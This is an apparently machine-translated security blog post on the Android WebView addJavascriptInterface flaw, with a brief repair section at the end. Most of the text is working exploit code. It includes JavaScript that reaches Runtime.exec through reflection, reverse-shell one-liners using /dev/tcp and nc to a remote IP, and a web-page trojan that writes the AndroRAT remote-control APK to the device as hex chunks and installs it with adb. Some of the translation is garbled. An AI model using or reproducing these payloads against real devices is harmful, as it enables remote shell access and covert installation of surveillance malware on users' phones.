Potential interface risks in WebView and use of mobile phone to mount Mali (including repair)

The 0x00 background encapsulates the webView control in the android sdk. This control mainly uses open control web browsing. Load the webView control in the program, and you can set attributes (color, Font, etc ). Similar to the directUI function in PC. In webView, there is a very special interface function addJavascriptInterface. It can implement interaction between local java and js. The addJavascriptInterface interface function can be used to control android devices through webkit.

0x01 Exploitation

In general, addJavascriptInterface is almost inevitable for designing Application pages using html, including not limited to android browsers.

Android code programs are generally used as follows:

settings.setJavaScriptEnabled(true);settings.setJavaScriptCanOpenWindowsAutomatically(true);mWebView.addJavascriptInterface(new JSInvokeClass(), "js2java");

Here we can use

apk->zip->dex->dex2jar->jdgui->java

Code.

However, we recommend that you use apktool to decompile smali (after all, not all apk files can be decompiled into java code)

In the smali code, it is similar to the following code:

const-string v0, " js2java "invoke-virtual {p1, v1, v0},Lcom/tiantianmini/android/browser/module/ac;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V

When the above Code is detected, further verification and exploitation can be performed:

In the past 11 years, some people have used addJavascriptInterface to read and write files, and released a simple poc. In the past 12 years, the exp of simple code execution has appeared. The built-in static variables of the reflection callback java class are used. Use the following code;

<script>function execute(cmdArgs){    return js2java.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}…</script>   

Execute linux shell commands using java exec.

0x02 remote shell Retrieval

To use yuange, Poc is much less than exp value.

Use addJavascriptInterface to implement shell.

There is no busybox in armlinux in Android, and some conventional shell methods are restricted.

The java reverse shell method is used.

//execute(["/system/bin/sh","-c","exec 5<>/dev/tcp/192.168.1.9/8088;cat <&5 | while read line; do \$line 2>&5 >&5; done"]);

On the android Virtual Machine of Nexus One 4.3, shell is not successfully displayed.

Then it is found that the nc command can be executed in android (castrated nc without-e)

Here we use another nc shell method.

Exp content:

 

<script>function execute(cmdArgs){return XXX.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}execute(["/system/bin/sh","-c","nc 192.168.1.9 8088|/system/bin/sh|nc 192.168.1.9 9999"]);alert("ok3");</script>

 

// Note xxx proxy for privacy protection.

The effect is as follows:
Bytes

Of course, you can use a remote IP address.

0x03 remote Trojan mounting

After all, it is an android environment, and shell is not very convenient to use. Similar xsser certainly does not meet this requirement.

Then, the website will be infected with Trojans.

Android 4.1 has been added to the ASLR technology, and heap injection is no longer valid. UAF is applicable to the android kernel version. Vulnerabilities exploiting their own characteristics are currently a reliable method.

Here we use androrat Remote Control Trojan as an example.

Implement webpage Trojan

Most browsers have prompted you to save the downloaded files. Here, I wrote andrat.apk to the Trojan webpage.

 

<script>function execute(cmdArgs){return xxx.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}  var armBinary = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x51\\x8F\\xCA\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x13\\x00\\x04\\x00\\x72\\x65\\x73\\x2F\\x6C\\x61\\x79\\x6F\\x75\\x74\\x2F\\x6D\\x61\\x69\\x6E\\x2E\\x78\\x6D\\x6C\\xFE\\xCA\\x00\\x00\\xAD\\x52\\x31\\x6F\\xD3\\x40\\x18\\xFD\\x2E\\x76\\xAE\\x86\\xC4\\x69\\x5A\\x3A\\x54\\xA2\\x12\\xA9\\xC4\\x80\\x22\\x61\\xE3\\xAA\\x42\\x4D\\xC7\\x22\\x86\\x4A\\x91\\xA8\\x14\\xC4\\x0A\\x56\\x7C\\xC2\\x27\\x68\\x1C\\x39\\x57\\x0A\\x53\\x11\\x3B\\x63\\x37\\x06\\xFE\\x01\\x33\\x1B\\x43\\x17\\x36\\x56\\xFE\\x07\\xAC\\x6D\\x9F\\xCB\\x1D\\x3D\\x……var patharm = "/data/app/Androrat.apk";var a=execute(["/system/bin/sh","-c","echo -n '"+armBinary+"' > " + patharm]);execute(["chmod"," 755 ","/data/app/Androrat.apk"]);

 

There are several problems:

The hex value of andrat.apk is about 300 k. the browser or java exec may have a limit on the input parameter size (the tested browser cannot execute the command)

The/data/app/directory has permission issues and requires root. The same applies to chmod.

For Android, Silent Installation either has the root or system-Signed install permission, or is made into preinstalled software and restarted. Alternatively, you can call the hidden api to install Python 2.2 or later.

After the fuzz experiment, the trojan mounting function is completed:

 

<script>function execute(cmdArgs){return xxx.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);}  var armBinary1 = "\\x50\\x4B\\x03\\x04\\x14\\x00\\x08\\x00\\x08\\x00\\x51\\x8F\\xCA\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x13\\x00\\x04\\x00\\x72\\x65\\x73\\x2F\\x6C\\x61\\x79\\x6F\\x75\\x74\\x2F\\x6D\\x61\\x69\\x6E\\x2E\\x78\\x6D\\x6C\\xFE\\xCA\\x00\\x00\\xAD\\x52\\x31\\x6F\\xD3\\x40\\x18\\xFD\\x2E\\x76\\xAE\\x86\\xC4\\x69\\x5A\\x3A\\x54\\xA2\\x12\\xA9\\xC4\ var armBinary2="\\x1B\\xB0\\x65\\x0A\\xAD\\x23\\xC2\\x30\\x64\\xDF\\xEE\\xA1\\x0D\\xA4\\xE8\\x3F\\x61\\x80\\xEE\\xBC\\xE1\\xE7\\x7B\\x4A\\x25\\x6F\\x8B\\x36\\x71\\xC3\\x80\\x81\\x58\\xDB\\xC9\\x8F\\x53\\x9F\\xEE\\x8A\\x45\\xAF\\x23\\x54\\x4A\\xCF\\x2B\\x52\\xF2\\x33\\x84\\xBA\\x82\\x36\\xC4\\x0D\\x08\\xAF\\xC2\\x61\\x8E\\xD8\\x7B\\x0B\\xFC\\x88\\x4A\\x25\\x24\\x8C\\x22\\xFA\\x76\\x44\\x78\\x5E\\x99\\x62\\x30\\x44\\x8D\\xDB\\x74\\x94\\ var armBinary3=…var armBinary4=………var patharm = "/mnt/sdcard/Androrat.apk";var a=execute(["/system/bin/sh","-c","echo -n '"+armBinary1+"' > " + patharm]);//alert(a);execute(["/system/bin/sh","-c","echo -n '"+armBinary2+"' >> " + patharm]);execute(["/system/bin/sh","-c","echo  -n '"+armBinary3+"' >> " + patharm]);execute(["/system/bin/sh","-c","echo -n '"+armBinary4+"' >> " + patharm]);execute(["/system/bin/sh","-c","adb install /mnt/sdcard/Androrat.apk"]);alert("over !!!");</script>

 

Split androrat.apk.

Use echo to write data to sdcard (this directory is readable and writable and cannot be executed ).

Use your own adb for installation (there are not many xx mobile assistants installed ).
Bytes

Androrat is successfully installed. Here the debug = true mode of androrat is used.

Connect to the control end.

0x04 repair

1. Android 4.2 (api17) has begun to adopt the new interface function [method should be called in java :)], @ JavascriptInterface replaces addjavascriptInterface, and some android 2.3 will not be upgraded, and the browser needs to be compatible.

2. When using js2java bridge, you need to verify each input parameter to shield the attack code.

3. Control related permissions or try not to use the js2java bridge.

Link:
Http://developer.android.com/reference/android/webkit/WebView.html
Http://developer.android.com/reference/android/webkit/WebView.html#addJavascriptInterface (java. lang. Object, java. lang. String)
Http://www.cis.syr.edu /~ Wedu/Research/paper/webview_acsac2011.pdf
Http: // 50.56.33.56/blog /? P = 314